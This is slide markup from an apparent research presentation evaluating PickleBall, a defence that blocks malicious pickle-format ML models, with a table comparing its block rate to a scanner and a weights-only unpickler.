                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>75/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>89.3%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="550975">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>ModelTracer</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Scanner</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>44/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>52.4%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Weights-Only Unpickler</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>84/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>P</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ICKLE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>B</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Inter Light"/>
                          <a:ea typeface="Inter Light"/>
                          <a:cs typeface="Inter Light"/>
                          <a:sym typeface="Inter Light"/>
                        </a:rPr>
                        <a:t>ALL</a:t>
                      </a:r>
                      <a:endParaRPr sz="1000">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Restricted Loader</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>84/84</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>100%</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425" anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1035" name="Google Shape;1035;p81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="38125" y="1554947"/>
            <a:ext cx="405000" cy="389700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F4CCCC"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="12275">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="58875" lIns="58875" spcFirstLastPara="1" rIns="58875" wrap="square" tIns="58875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="901"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1036" name="Google Shape;1036;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="38125" y="1554939"/>
            <a:ext cx="404978" cy="389345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1037" name="Google Shape;1037;p81"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="220827" y="1874031"/>
            <a:ext cx="697722" cy="697722"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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41" name="Shape 1041"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1042" name="Google Shape;1042;p82"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629175" y="0"/>
            <a:ext cx="8514900" cy="689100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Evaluation: P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> Creates Secure and Usable Policies</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1043" name="Google Shape;1043;p82"/>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1044" name="Google Shape;1044;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="316675" y="896800"/>
            <a:ext cx="4496700" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="B9D8EB"/>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en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>RQ:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> How well does P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en">
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>prevent malicious pickle models</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t> from executing their payloads? </a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1045" name="Google Shape;1045;p82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257475" y="896813"/>
            <a:ext cx="3651300" cy="514200"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D9EAD3"/>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a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ICKLE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>ALL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>blocks </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:rPr>
              <a:t>ALL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:rPr>
              <a:t>malicious models.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Inter Light"/>
              <a:ea typeface="Inter Light"/>
              <a:cs typeface="Inter Light"/>
              <a:sym typeface="Inter Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1046" name="Google Shape;1046;p82"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="952500" y="1618725"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{11C30A3B-6D4B-4216-B4AD-653BF54A5768}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1441700"/>
                <a:gridCol w="1157000"/>
                <a:gridCol w="1113625"/>
                <a:gridCol w="1194125"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Tool</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Malicious Blocked</a:t>
                      </a:r>
                      <a:endParaRPr b="1">
                        <a:latin typeface="Inter"/>
                        <a:ea typeface="Inter"/>
                        <a:cs typeface="Inter"/>
                        <a:sym typeface="Inter"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="91425" marB="91425" marR="91425" marL="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en">
                          <a:latin typeface="Inter"/>
                          <a:ea typeface="Inter"/>
                          <a:cs typeface="Inter"/>
                          <a:sym typeface="Inter"/>
                        </a:rPr>
                        <a:t>Correct Block Rate</a:t>
                      </a:r>
